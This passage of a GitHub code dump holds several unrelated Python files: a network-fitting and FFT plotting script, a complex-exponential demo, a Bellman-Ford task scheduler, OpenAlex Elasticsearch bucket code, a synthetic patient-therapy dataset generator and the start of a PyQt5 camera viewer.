name=\"\"):\n\n if R[\"input_dim\"] == 2:\n X = np.arange(R[\"x_start\"], R[\"x_end\"], 0.1)\n Y = np.arange(R[\"x_start\"], R[\"x_end\"], 0.1)\n X, Y = np.meshgrid(X, Y)\n xy = np.concatenate(\n (np.reshape(X, [-1, 1]), np.reshape(Y, [-1, 1])), axis=1\n )\n Z = np.reshape(get_y(xy), [len(X), -1])\n\n fp = plt.figure()\n ax = fp.gca(projection=\"3d\")\n surf = ax.plot_surface(\n X, Y, Z - np.min(Z), cmap=cm.coolwarm, linewidth=0, antialiased=False\n )\n ax.zaxis.set_major_locator(LinearLocator(5))\n ax.zaxis.set_major_formatter(FormatStrFormatter(\"%.02f\"))\n fp.colorbar(surf, shrink=0.5, aspect=5)\n ax.scatter(\n train_inputs[:, 0],\n train_inputs[:, 1],\n R[\"y_train\"] - 
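# [Editorial note and sketch, not part of the original record.]  One caveat in the
# loop above: run_onestep() decays R["learning_rate"] on every call, but run()
# builds the Adam optimiser once with a fixed lr=2e-4 and never reads the decayed
# value back, so the schedule has no effect as written.  One way to actually apply
# a multiplicative decay each epoch:
def apply_lr_decay(optimizer, decay):
    # param_groups is the supported hook for changing an optimiser's lr in place.
    for group in optimizer.param_groups:
        group["lr"] *= 1 - decay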
np.min(R[\"y_train\"]),\n )\n fntmp = \"%s2du%s\" % (FolderName, name)\n save_fig(plt, fntmp, ax=ax, isax=1, iseps=0)\n\n if R[\"input_dim\"] == 1:\n plt.figure()\n ax = plt.gca()\n y1 = R[\"y_test\"]\n y2 = R[\"y_true_train\"]\n plt.plot(test_inputs, y1, \"r-\", label=\"Test\")\n plt.plot(train_inputs, y2, \"b*\", label=\"True\")\n plt.title(\"g2u\", fontsize=15)\n plt.legend(fontsize=18)\n fntmp = \"%su_m%s\" % (FolderName, name)\n fntmp = \"%su_m%s\" % (FolderName, \"\")\n save_fig(plt, fntmp, ax=ax, isax=1, iseps=0)\n\n def save_file(self):\n with open(\"%s/objs.pkl\" % (FolderName), \"wb\") as f:\n pickle.dump(R, f, protocol=4)\n with open(\"%s/objsy.pkl\" % (FolderName), \"wb\") as f:\n pickle.dump(Ry, f, protocol=4)\n with open(\"%s/objsw.pkl\" % (FolderName), \"wb\") as f:\n pickle.dump(Rw, f, protocol=4)\n text_file = open(\"%s/Output.txt\" % (FolderName), \"w\")\n for para in R:\n if np.size(R[para]) > 20:\n continue\n text_file.write(\"%s: %s\\n\" % (para, R[para]))\n text_file.write(\"loss end: %s\\n\" % (R[\"loss_train\"][-1]))\n # text_file.write('weight ini: %s\\n' % (Rw['weight_R'][0]))\n text_file.close()\n\n\nt0 = time.time()\nnet_ = Network().to(device)\n# net_.apply(weights_init)\nprint(net_)\n\ncriterion = nn.MSELoss(reduction=\"mean\").to(device)\nmodel = Model()\nmodel.run(3000)\n\ny_pred = R[\"y_train\"]\ny_fft = my_fft(R[\"y_true_train\"]) / R[\"train_size\"]\nplt.semilogy(y_fft + 1e-5, label=\"real\")\nidx = SelectPeakIndex(y_fft, endpoint=False)\nplt.semilogy(idx, y_fft[idx] + 1e-5, \"o\")\ny_fft_pred = my_fft(y_pred) / R[\"train_size\"]\nplt.semilogy(y_fft_pred + 1e-5, label=\"train\")\nplt.semilogy(idx, y_fft_pred[idx] + 1e-5, \"o\")\nplt.legend()\nplt.xlabel(\"freq idx\")\nplt.ylabel(\"freq\")\nplt.savefig(FolderName + \"fft.png\")\n\ny_pred_epoch = np.squeeze(Ry[\"y_all\"])\nidx1 = idx[:3]\nabs_err = np.zeros([len(idx1), len(Ry[\"y_all\"])])\ny_fft = my_fft(R[\"y_true_train\"])\ntmp1 = y_fft[idx1]\nfor i in range(len(y_pred_epoch)):\n tmp2 = my_fft(y_pred_epoch[i])[idx1]\n abs_err[:, i] = np.abs(tmp1 - tmp2) / (1e-5 + tmp1)\n\nplt.figure()\nplt.pcolor(abs_err, cmap=\"RdBu\", vmin=0.1, vmax=1)\nplt.colorbar()\nplt.savefig(FolderName + \"/hot.png\")\n","repo_name":"paoxiaode/MATH8013","sub_path":"result/fitndtorch.py","file_name":"fitndtorch.py","file_ext":"py","file_size_in_byte":21520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"27401265310","text":"import numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\n\nassert Axes3D\n\ntitle = \"Exponentielle complexe 3D\"\nauthors = \"F. Orieux\"\nemail = \"orieux@l2s.centralesupelec.fr\"\n\n\ndef expc(t, A=1, r=0.2, ω=5):\n p = r + 1j * ω\n return A * np.exp(2 * np.pi * p * t)\n\n\nclass Demo:\n def __init__(self, fig):\n fig.clf()\n self.t = np.linspace(-1, 1, 1000)\n self.axe = fig.add_subplot(111, projection=\"3d\", proj_type=\"ortho\")\n res = expc(self.t)\n (self.line,) = self.axe.plot(self.t, np.real(res), np.imag(res))\n\n self.axe.set_xlabel(\"t\", labelpad=30)\n self.axe.set_ylabel(r\"$Re[e^{pt}]$\", labelpad=30)\n self.axe.set_zlabel(r\"$Im[e^{pt}]$\", labelpad=30)\n\n self.axe.set_title(\n r\"L'exponentielle complexe $e^{pt} = e^{σt}e^{ιωt} = \"\n r\"e^{σt} × [cos(ωt) + ι sin(ω t)]$, $p = σ + ι ω$\",\n )\n\n def interact(\n self,\n A: (0, 2, 10) = 1,\n r: (-0.3, 0.3, 10) = 0.2,\n ω: (-10.0, 10.0, 10) = 5,\n pr: \"Im.\" = None,\n pi: \"Re.\" = None,\n pt: \"Proj. 
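# [Illustrative sketch, not part of the original record.]  expc() above plots
# A * exp(2*pi*p*t) with p = r + 1j*omega: r sets the exponential envelope and
# omega the rotation rate, by Euler's identity
# e^{(sigma + i*omega)t} = e^{sigma*t} (cos(omega*t) + i*sin(omega*t)).
# Quick numerical check of that identity:
import numpy as np

sigma, omega, t = 0.2, 5.0, 0.37
lhs = np.exp((sigma + 1j * omega) * t)
rhs = np.exp(sigma * t) * (np.cos(omega * t) + 1j * np.sin(omega * t))
assert np.isclose(lhs, rhs)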
t\" = None,\n ):\n res = expc(self.t, A=A, r=r, ω=ω)\n self.line.set_data_3d(self.t, np.real(res), np.imag(res))\n\n if pr:\n self.axe.view_init(elev=0, azim=-90)\n\n if pi:\n self.axe.view_init(elev=90, azim=-90)\n\n if pt:\n self.axe.view_init(elev=0, azim=0)\n","repo_name":"forieux/teachapp","sub_path":"demos/Bases du signal/expc3d.py","file_name":"expc3d.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"4816237779","text":"import networkx as nx\r\n\r\n\r\ndef get_user_input():\r\n constraints = []\r\n\r\n num_tasks = int(input(\"Enter the number of tasks: \"))\r\n\r\n for i in range(num_tasks):\r\n while True:\r\n duration = input(\r\n f\"Enter the duration (in hours) of task {i + 1} (e.g., '2' or '1-2' for a range): \"\r\n )\r\n if \"-\" in duration:\r\n try:\r\n min_duration, max_duration = map(int, duration.split(\"-\"))\r\n\r\n if min_duration <= max_duration:\r\n constraints.append(\r\n (i, i + 1, range(min_duration, max_duration + 1))\r\n )\r\n break\r\n else:\r\n print(\r\n \"Invalid duration range. Please ensure the start of the range is less than or equal to the end.\"\r\n )\r\n except ValueError:\r\n print(\r\n \"Invalid range. Please enter in the correct format (e.g., '1-2').\"\r\n )\r\n else:\r\n try:\r\n fixed_duration = int(duration)\r\n constraints.append((i, i + 1, fixed_duration))\r\n break\r\n except ValueError:\r\n print(\"Invalid input. Please enter an integer.\")\r\n\r\n return constraints, num_tasks\r\n\r\n\r\ndef convert_to_24_hour_format(time_str):\r\n \"\"\"\r\n Converts a time string in the format \"hh am/pm\" to a 24-hour format.\r\n \"\"\"\r\n time, period = time_str.split()\r\n hour = int(time)\r\n\r\n if period.lower() == \"pm\" and hour != 12:\r\n hour += 12\r\n elif period.lower() == \"am\" and hour == 12:\r\n hour = 0\r\n\r\n return hour\r\n\r\n\r\ndef format_constraints(constraints):\r\n formatted_constraints = []\r\n\r\n for constraint in constraints:\r\n task_i, task_j, duration = constraint\r\n\r\n if isinstance(duration, range):\r\n l = min(duration)\r\n u = max(duration)\r\n formatted_constraints.append(f\"{l} <= t(x{task_j}) - t(x{task_i}) <= {u}\")\r\n else:\r\n formatted_constraints.append(\r\n f\"{duration} <= t(x{task_j}) - t(x{task_i}) <= {duration}\"\r\n )\r\n return formatted_constraints\r\n\r\n\r\ndef build_graph(constraints, num_tasks, start_hour, end_hour):\r\n G = nx.DiGraph()\r\n\r\n G.add_node(\"x0\")\r\n\r\n G.add_edge(\"x0\", \"x1\", weight=start_hour)\r\n total_hours = end_hour - start_hour\r\n\r\n G.add_edge(\"x0\", f\"x{num_tasks}\", weight=total_hours)\r\n\r\n for xi, xj, duration in constraints:\r\n if isinstance(duration, range):\r\n l = min(duration)\r\n u = max(duration)\r\n else:\r\n l = u = duration\r\n\r\n G.add_edge(f\"x{xi}\", f\"x{xj}\", weight=u)\r\n if not (f\"x{xi}\" == f\"x{num_tasks}\" and f\"x{xj}\" == \"x0\"):\r\n G.add_edge(f\"x{xj}\", f\"x{xi}\", weight=-l)\r\n\r\n return G\r\n\r\n\r\ndef bellman_ford(G, source):\r\n distances = {node: float(\"inf\") for node in G.nodes()}\r\n predecessor = {node: None for node in G.nodes()}\r\n distances[source] = 0\r\n\r\n for _ in range(len(G.nodes()) - 1):\r\n for u, v, weight in G.edges(data=\"weight\"):\r\n if distances[u] != float(\"inf\") and distances[u] + weight < distances[v]:\r\n distances[v] = distances[u] + weight\r\n predecessor[v] = u\r\n\r\n for u, v, weight in G.edges(data=\"weight\"):\r\n if distances[u] != float(\"inf\") and distances[u] + weight < 
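# [Illustrative sketch, not part of the original record.]  build_graph() above
# encodes each constraint l <= t(xj) - t(xi) <= u as two edges, xi -> xj with
# weight u and xj -> xi with weight -l: the standard difference-constraint
# construction, in which shortest-path distances from x0 satisfy every constraint
# and an infeasible system surfaces as a negative cycle.  Tiny example with
# 2 <= t(x1) - t(x0) <= 3:
import networkx as nx

g = nx.DiGraph()
g.add_edge("x0", "x1", weight=3)   # t(x1) - t(x0) <= 3
g.add_edge("x1", "x0", weight=-2)  # t(x0) - t(x1) <= -2, i.e. t(x1) - t(x0) >= 2
dist = dict(nx.single_source_bellman_ford_path_length(g, "x0"))
assert dist == {"x0": 0, "x1": 3}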
distances[v]:\r\n cycle = [v, u]\r\n while predecessor[u] not in cycle:\r\n cycle.append(predecessor[u])\r\n u = predecessor[u]\r\n cycle.append(predecessor[u])\r\n print(\"Negative cycle detected: \", \" -> \".join(cycle))\r\n return (\r\n None,\r\n None,\r\n )\r\n\r\n return distances, predecessor\r\n\r\n\r\ndef print_graph(G):\r\n print(\"\\nGraph:\")\r\n print(\"Nodes:\", G.nodes())\r\n print(\"Edges:\")\r\n for edge in G.edges(data=True):\r\n print(f\"{edge[0]} -> {edge[1]} (weight: {edge[2]['weight']})\")\r\n\r\n\r\ndef time_conversion(hour, start_hour):\r\n \"\"\"Converts the hour to a 12-hour format with AM/PM.\"\"\"\r\n adjusted_hour = (hour + start_hour) % 24\r\n if adjusted_hour == 0:\r\n return \"12 AM\"\r\n elif adjusted_hour < 12:\r\n return f\"{adjusted_hour} AM\"\r\n elif adjusted_hour == 12:\r\n return \"12 PM\"\r\n else:\r\n return f\"{adjusted_hour - 12} PM\"\r\n\r\n\r\ndef adjust_constraints(\r\n constraints, task_to_change, new_start_time, num_tasks, start_hour, end_hour\r\n):\r\n \"\"\"\r\n Adjusts the constraints when a task's start time is changed by the user.\r\n Only the constraints for the tasks that come after the fixed task are updated.\r\n \"\"\"\r\n\r\n new_start_hour = convert_to_24_hour_format(new_start_time)\r\n updated_task_index = task_to_change\r\n new_constraints = []\r\n\r\n # Adjust constraints for the remaining tasks relative to the updated task\r\n for i, (task_i, task_j, duration) in enumerate(constraints):\r\n if task_i >= updated_task_index:\r\n # Reindex the tasks relative to the updated task\r\n new_task_i = task_i - updated_task_index\r\n new_task_j = task_j - updated_task_index\r\n new_constraints.append((new_task_i, new_task_j, duration))\r\n\r\n # Adjust the global constraint for the end of the day based on the new start time\r\n remaining_hours = end_hour - new_start_hour\r\n new_constraints.insert(\r\n 0, (0, num_tasks - updated_task_index, range(0, remaining_hours + 1))\r\n )\r\n\r\n return new_constraints\r\n\r\n\r\ndef main():\r\n constraints, num_tasks = get_user_input()\r\n while True:\r\n start_time_str = input(\r\n \"Enter the hour you want to start your day (e.g., '5 am'): \"\r\n )\r\n end_time_str = input(\r\n \"Enter the hour you want to end your day (e.g., '10 pm'): \"\r\n )\r\n\r\n start_hour = convert_to_24_hour_format(start_time_str)\r\n end_hour = convert_to_24_hour_format(end_time_str)\r\n\r\n if start_hour < end_hour:\r\n break\r\n else:\r\n print(\r\n \"Invalid time range! Please make sure the start time is earlier than the end time. Try again.\"\r\n )\r\n\r\n total_hours = end_hour - start_hour\r\n\r\n constraints.append((0, num_tasks, range(0, total_hours + 1)))\r\n\r\n print(\"\\nConstraints:\")\r\n formatted_constraints = format_constraints(constraints)\r\n for constraint in formatted_constraints:\r\n print(constraint)\r\n\r\n G = build_graph(constraints, num_tasks, start_hour, end_hour)\r\n\r\n # Run Bellman-Ford for earliest start times\r\n G_earliest = G.reverse(copy=True)\r\n print(print_graph(G))\r\n print(\"\\nCalculating earliest start times...\")\r\n result_earliest = bellman_ford(G_earliest, \"x0\")\r\n if result_earliest == (None, None):\r\n print(\"Negative cycle detected for earliest start times. 
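# [Editorial note, not part of the original record.]  The two Bellman-Ford passes
# here exploit a duality: running on G gives the *latest* feasible start times
# directly (shortest distances from x0 are upper bounds), while running on
# G.reverse() gives the *earliest* ones with the sign flipped, which is why the
# printing code below negates distances_earliest[node].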
No solution exists.\")\r\n return 0\r\n else:\r\n distances_earliest, _ = result_earliest\r\n\r\n # Run Bellman-Ford for latest start times\r\n print(\"\\nCalculating latest start times...\")\r\n result_latest = bellman_ford(G, \"x0\")\r\n if result_latest == (None, None):\r\n print(\"Negative cycle detected for latest start times. No solution exists.\")\r\n return 0\r\n else:\r\n distances_latest, _ = result_latest\r\n \r\n print(\"\\nLatest start times:\")\r\n for node in sorted(distances_latest.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n print(f\"{node}: {time_conversion(distances_latest[node], start_hour)}\")\r\n\r\n print(\"\\nEarliest start times:\")\r\n for node in sorted(distances_earliest.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n print(f\"{node}: {time_conversion(-distances_earliest[node], start_hour)}\")\r\n\r\n\r\n print(\"SHORTEST PATH COMPUTATIONS:\")\r\n print(\"\\nTotal Duration of Shortest Paths for Earliest Start Times:\")\r\n for node in sorted(distances_earliest.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n total_duration_earliest = -distances_earliest[\r\n node\r\n ] # Use negative value for earliest start times\r\n print(f\"Total duration to {node} (Earliest): {total_duration_earliest} hour(s)\")\r\n\r\n print(\"\\nTotal Duration of Shortest Paths for Latest Start Times:\")\r\n for node in sorted(distances_latest.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n total_duration_latest = distances_latest[node]\r\n print(f\"Total duration to {node} (Latest): {total_duration_latest} hour(s)\")\r\n \r\n\r\n\r\n\r\n\r\n # Ask if the user wants to change anything\r\n while True:\r\n change_schedule = (\r\n input(\"Would you like to change any task in the schedule? (yes/no): \")\r\n .strip()\r\n .lower()\r\n )\r\n\r\n if change_schedule == \"no\":\r\n break # Exit the loop if the user doesn't want to change the schedule\r\n \r\n print(\"\\nAvailable time ranges for each task:\")\r\n for i in range(1, num_tasks + 1):\r\n earliest_time = time_conversion(-distances_earliest[f\"x{i}\"], start_hour)\r\n latest_time = time_conversion(distances_latest[f\"x{i}\"], start_hour)\r\n print(f\"Task {i}: {earliest_time} - {latest_time}\")\r\n task_to_change = int(\r\n input(\"Which task number do you want to change? (Enter the task number): \")\r\n )\r\n\r\n # Update the last updated task\r\n last_updated_task = task_to_change\r\n\r\n # Ask for a new time within this range\r\n new_time_str = input(\r\n f\"Enter the new start time for Task {task_to_change} (within the range above): \"\r\n )\r\n new_time_hour = convert_to_24_hour_format(new_time_str)\r\n constraints = adjust_constraints(\r\n constraints, task_to_change, new_time_str, num_tasks, start_hour, end_hour\r\n )\r\n updated_task_index = task_to_change\r\n # Rebuild the graph with updated constraints for the uncompleted tasks\r\n\r\n G_updated = build_graph(\r\n constraints, # Only use constraints from updated tasks onwards\r\n num_tasks - updated_task_index, # Adjust the number of tasks accordingly\r\n new_time_hour,\r\n end_hour,\r\n )\r\n\r\n\r\n print(\r\n \"\\nRecalculating times for subsequent tasks starting from the updated task...\"\r\n )\r\n\r\n result_earliest_updated = bellman_ford(G_updated.reverse(copy=True), \"x0\")\r\n\r\n result_latest_updated = bellman_ford(G_updated, \"x0\")\r\n\r\n if result_earliest_updated == (None, None):\r\n print(\r\n \"Negative cycle detected for earliest start times. 
No solution exists.\"\r\n )\r\n return 0\r\n else:\r\n distances_earliest_updated, _ = result_earliest_updated\r\n\r\n print(\"\\nCalculating latest start times...\")\r\n if result_latest_updated == (None, None):\r\n print(\"Negative cycle detected for latest start times. No solution exists.\")\r\n return 0\r\n else:\r\n distances_latest_updated, _ = result_latest_updated\r\n\r\n\r\n print(\"SHORTEST PATH COMPUTATIONS:\")\r\n print(\"\\nTotal Duration of Shortest Paths for Earliest Start Times:\")\r\n for node in sorted(distances_earliest_updated.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n total_duration_earliest_updated = -distances_earliest_updated[\r\n node\r\n ] # Use negative value for earliest start times\r\n print(f\"Total duration to {node} (Earliest): {total_duration_earliest_updated} hour(s)\")\r\n\r\n print(\"\\nTotal Duration of Shortest Paths for Latest Start Times:\")\r\n for node in sorted(distances_latest_updated.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n total_duration_latest_updated = distances_latest_updated[node]\r\n print(f\"Total duration to {node} (Latest): {total_duration_latest_updated} hour(s)\")\r\n \r\n\r\n# Print Latest Start Times\r\n print(\"\\nLatest start times:\")\r\n for node in sorted(distances_latest_updated.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n print(f\"{node}: {time_conversion(distances_latest_updated[node], new_time_hour)}\")\r\n\r\n # Print Earliest Start Times\r\n print(\"\\nEarliest start times:\")\r\n for node in sorted(distances_earliest_updated.keys(), key=lambda x: (len(x), x)):\r\n if node == \"x0\":\r\n continue\r\n print(f\"{node}: {time_conversion(-distances_earliest_updated[node], new_time_hour)}\")\r\n\r\n\r\n start_hour=new_time_hour\r\n\r\n distances_earliest=distances_earliest_updated\r\n distances_latest=distances_latest_updated\r\n\r\n num_tasks=num_tasks-task_to_change\r\n\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n main()","repo_name":"JSutanto19/DSCI-599-Frontend","sub_path":"code/backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":13147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41621864130","text":"from elasticsearch_dsl import A, Q, AttrDict\n\nimport settings\nfrom core.cursor import decode_group_by_cursor\nfrom core.group_by.utils import get_bucket_keys, parse_group_by\nfrom core.validate import validate_group_by\nfrom core.preference import clean_preference\nfrom core.utils import get_field\nfrom countries import GLOBAL_SOUTH_COUNTRIES\n\n\n\"\"\"\nBucket creation.\n\"\"\"\n\n\ndef create_group_by_buckets(fields_dict, group_by_item, s, params):\n cursor = params.get(\"cursor\")\n q = params.get(\"q\")\n per_page = 500 if q else params.get(\"per_page\")\n sort_params = params.get(\"sort\")\n\n s = s.params(preference=clean_preference(group_by_item))\n field = get_field(fields_dict, group_by_item)\n validate_group_by(field, params)\n\n if field.param in [\"best_open_version\", \"version\"] or \"continent\" in field.param:\n return s\n\n group_by, known = parse_group_by(group_by_item)\n group_by_field = field.alias if field.alias else field.es_sort_field()\n\n bucket_keys = get_bucket_keys(group_by)\n\n missing = get_missing(field)\n shard_size = determine_shard_size(q)\n\n s = filter_by_repository_or_journal(field, s)\n\n if sort_params:\n create_sorted_group_by_buckets(\n bucket_keys,\n group_by_field,\n known,\n missing,\n 
per_page,\n s,\n shard_size,\n sort_params,\n )\n elif \"is_global_south\" in field.param:\n create_global_south_group_by_buckets(bucket_keys, group_by_field, s)\n elif (\n field.param in settings.EXTERNAL_ID_FIELDS\n or field.param in settings.BOOLEAN_TEXT_FIELDS\n ):\n create_boolean_group_by_buckets(bucket_keys, group_by_field, s)\n elif cursor:\n if cursor and cursor != \"*\":\n after_key = decode_group_by_cursor(cursor)\n else:\n after_key = None\n create_pagination_group_by_buckets(\n bucket_keys, group_by_field, known, missing, params, s, after_key\n )\n else:\n create_default_group_by_buckets(\n bucket_keys, group_by_field, known, missing, per_page, s, shard_size\n )\n\n return s\n\n\ndef create_sorted_group_by_buckets(\n bucket_keys, group_by_field, known, missing, per_page, s, shard_size, sort_params\n):\n for key, order in sort_params.items():\n if key in [\"count\", \"key\"]:\n order_key = f\"_{key}\"\n a = A(\n \"terms\",\n field=group_by_field,\n order={order_key: order},\n size=per_page,\n shard_size=shard_size,\n )\n if not known:\n a.missing = missing\n s.aggs.bucket(bucket_keys[\"default\"], a)\n return s\n\n\ndef create_global_south_group_by_buckets(bucket_keys, group_by_field, s):\n country_codes = [c[\"country_code\"] for c in GLOBAL_SOUTH_COUNTRIES]\n exists = A(\"filter\", Q(\"terms\", **{group_by_field: country_codes}))\n not_exists = A(\"filter\", ~Q(\"terms\", **{group_by_field: country_codes}))\n s.aggs.bucket(bucket_keys[\"exists\"], exists)\n s.aggs.bucket(bucket_keys[\"not_exists\"], not_exists)\n return s\n\n\ndef create_boolean_group_by_buckets(bucket_keys, group_by_field, s):\n exists = A(\"filter\", Q(\"exists\", field=group_by_field))\n not_exists = A(\"filter\", ~Q(\"exists\", field=group_by_field))\n s.aggs.bucket(bucket_keys[\"exists\"], exists)\n s.aggs.bucket(bucket_keys[\"not_exists\"], not_exists)\n return s\n\n\ndef create_pagination_group_by_buckets(\n bucket_keys, group_by_field, known, missing, params, s, after_key\n):\n sources = [{\"sub_key\": {\"terms\": {\"field\": group_by_field}}}]\n\n composite_agg = A(\"composite\", sources=sources, size=params[\"per_page\"])\n\n if after_key:\n composite_agg.after = after_key\n\n # handle missing value\n if known and missing is not None:\n s = s.filter(\"bool\", must=[{\"exists\": {\"field\": group_by_field.es_field()}}])\n s.aggs.bucket(bucket_keys[\"default\"], composite_agg)\n return s\n\n\ndef create_default_group_by_buckets(\n bucket_keys, group_by_field, known, missing, per_page, s, shard_size\n):\n a = A(\n \"terms\",\n field=group_by_field,\n size=per_page,\n shard_size=shard_size,\n )\n if not known:\n a.missing = missing\n s.aggs.bucket(bucket_keys[\"default\"], a)\n return s\n\n\ndef determine_shard_size(q):\n return 5000 if q else 3000\n\n\ndef get_missing(field):\n if (\n type(field).__name__ == \"RangeField\"\n or type(field).__name__ == \"BooleanField\"\n or field.param == \"ids.crossref\"\n ):\n missing = -111\n else:\n missing = \"unknown\"\n return missing\n\n\ndef filter_by_repository_or_journal(field, s):\n if (\n field.param == \"repository\"\n or field.param == \"locations.source.host_institution_lineage\"\n ):\n s = s.filter(\"term\", **{\"locations.source.type\": \"repository\"})\n if field.param == \"journal\":\n s = s.filter(\"term\", **{\"primary_location.source.type\": \"journal\"})\n return s\n\n\n\"\"\"\nBucket retrieval.\n\"\"\"\n\n\ndef get_default_buckets(group_by, response):\n bucket_keys = get_bucket_keys(group_by)\n buckets = 
response.aggregations[bucket_keys[\"default\"]].buckets\n buckets = transform_paginated_buckets(buckets)\n return buckets\n\n\ndef transform_paginated_buckets(buckets):\n \"\"\"\n Paginated buckets (composite) have a different structure than non-paginated buckets.\n Convert the paginated buckets to the same structure as non-paginated buckets.\n \"\"\"\n for b in buckets:\n if isinstance(b.key, AttrDict):\n b.key = b.key[\"sub_key\"]\n return buckets\n\n\ndef buckets_to_keep(buckets, group_by):\n if group_by.endswith(\"host_institution_lineage\"):\n buckets = keep_institution_buckets(buckets)\n elif group_by.endswith(\"publisher_lineage\"):\n buckets = keep_publisher_buckets(buckets)\n return buckets\n\n\ndef filter_buckets_by_key_start(buckets, key_prefix):\n return [\n b\n for b in buckets\n if b[\"key\"] and (b[\"key\"].startswith(key_prefix) or b[\"key\"] == \"unknown\")\n ]\n\n\ndef keep_institution_buckets(buckets):\n return filter_buckets_by_key_start(buckets, \"https://openalex.org/I\")\n\n\ndef keep_publisher_buckets(buckets):\n return filter_buckets_by_key_start(buckets, \"https://openalex.org/P\")\n\n\ndef get_bucket_doc_count(group_by, response, bucket_key):\n bucket_keys = get_bucket_keys(group_by)\n return response.aggregations[bucket_keys[bucket_key]].doc_count\n\n\ndef exists_bucket_count(group_by, response):\n return get_bucket_doc_count(group_by, response, \"exists\")\n\n\ndef not_exists_bucket_count(group_by, response):\n return get_bucket_doc_count(group_by, response, \"not_exists\")\n","repo_name":"ourresearch/openalex-elastic-api","sub_path":"core/group_by/buckets.py","file_name":"buckets.py","file_ext":"py","file_size_in_byte":6702,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"96"} +{"seq_id":"71365911995","text":"import datetime\nimport json\nimport random\nfrom random import randrange\n\nimport pandas as pd\n\ni = 1\nlstConds = []\nlstCondTypes = [\"infectious disease\", \"deficiency disease\", \"hereditary disease\", \"physiological disease\"] \nj = 1\nlstTherapies = []\nlstTherapyTypes = [\"cognitive-behavioral therapy\", \"dialectical behavior therapy\", \"exposure therapy\", \"interpersonal therapy\", \"psychodynamic therapy\"]\nk = 1\nlstPatients = []\nwith open(\"/Users/bendo/Bendo_OneDrive/OneDrive - Kormányzati Informatikai Fejlesztési Ügynökség/Egyetem/UNITN/Data_Mining/final_project/patient-therapy-recommending/create_dataset/conditions.txt\") as file:\n for line in file:\n lstConds.append(\n {'id': i, 'name': line.rstrip(), 'type': random.choice(lstCondTypes)})\n i += 1\nwith open(\"/Users/bendo/Bendo_OneDrive/OneDrive - Kormányzati Informatikai Fejlesztési Ügynökség/Egyetem/UNITN/Data_Mining/final_project/patient-therapy-recommending/create_dataset/therapies.txt\") as file:\n for line in file:\n lstTherapies.append(\n {'id': 'th'+str(j), 'name': line.rstrip(), 'type': random.choice(lstTherapyTypes)})\n j += 1\nwith open(\"/Users/bendo/Bendo_OneDrive/OneDrive - Kormányzati Informatikai Fejlesztési Ügynökség/Egyetem/UNITN/Data_Mining/final_project/patient-therapy-recommending/create_dataset/nameshort.txt\") as file:\n for line in file:\n i = 1\n conditionCount = randrange(1, 20)\n lstTrials = []\n lstPreConds = []\n finishedConds = []\n for x in range(conditionCount):\n startDate = datetime.datetime(2015, 1, 1)\n nextTrial = randrange(5000)\n endDate = startDate + datetime.timedelta(days=nextTrial)\n timeStampStart = str(startDate.year) + \\\n str(startDate)[5:7] + str(startDate)[8:10]\n timeStampEnd = 
str(endDate.year) + \\\n str(endDate)[5:7] + str(endDate)[8:10]\n therapyIndex = randrange(len(lstTherapies))\n success = randrange(70, 101)\n conditionID = 'pc' + str(randrange(4))\n if conditionID not in finishedConds:\n trialDict = {'id': 'tr'+str(i), 'start': timeStampStart, 'end': timeStampEnd,\n 'condition': conditionID, 'therapy': lstTherapies[therapyIndex]['id'], 'successful': success}\n lstTrials.append(trialDict)\n if success == 100:\n finishedConds.append(conditionID)\n i += 1\n # preconditions\n dfx = pd.DataFrame(lstTrials)\n try:\n groupedConds = dfx.groupby(\"condition\", as_index=False).agg(\n start=(\"start\", \"min\"),\n end=(\"end\", \"max\"),\n success=(\"successful\", \"max\"))\n indexMax = len(groupedConds.index)\n for ind in range(0, indexMax):\n conditionIndex = randrange(len(lstConds))\n if groupedConds.iloc[ind]['success'] == 100:\n lstPreConds.append({'id': groupedConds.iloc[ind]['condition'], 'diagnosed': groupedConds.iloc[ind]\n ['start'], 'cured': groupedConds.iloc[ind]['end'], 'kind': lstConds[conditionIndex]['id']})\n else:\n lstPreConds.append(\n {'id': groupedConds.iloc[ind]['condition'], 'diagnosed': groupedConds.iloc[ind]['start'], 'cured': \"\", 'kind': lstConds[conditionIndex]['id']})\n except Exception:\n print(\"no conditions for patient\")\n lstPatients.append(\n {'id': k, 'name': line.rstrip(), 'conditions': lstPreConds, 'trials': lstTrials})\n k += 1\n print(line)\nwith open(\"/Users/bendo/Bendo_OneDrive/OneDrive - Kormányzati Informatikai Fejlesztési Ügynökség/Egyetem/UNITN/Data_Mining/final_project/patient-therapy-recommending/create_dataset/dataset.JSON\", \"w\") as jsonFile:\n myJSON = {'Conditions': lstConds, 'Therapies': lstTherapies, 'Patients': lstPatients}\n finalJSON = json.dumps(myJSON, indent=4)\n print(len(finalJSON))\n jsonFile.write(finalJSON)\n","repo_name":"Benedekkiraly/patient-therapy-recommending","sub_path":"create_dataset/build_JSON.py","file_name":"build_JSON.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74002586555","text":"\"\"\"\nIn this example, we demonstrate how to create a simple camera viewer using OpenCV3 and PyQt5\n\nAuthor: Berrouba.A\nLast edited: 21 Feb 2018\n\"\"\"\n\n# import system module\nimport sys\n\n# import some PyQt5 modules\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog ,QSlider, QCommonStyle, QStyle, QDialog\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtGui import QImage\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5 import QtMultimedia\n\n# import Opencv module\nimport 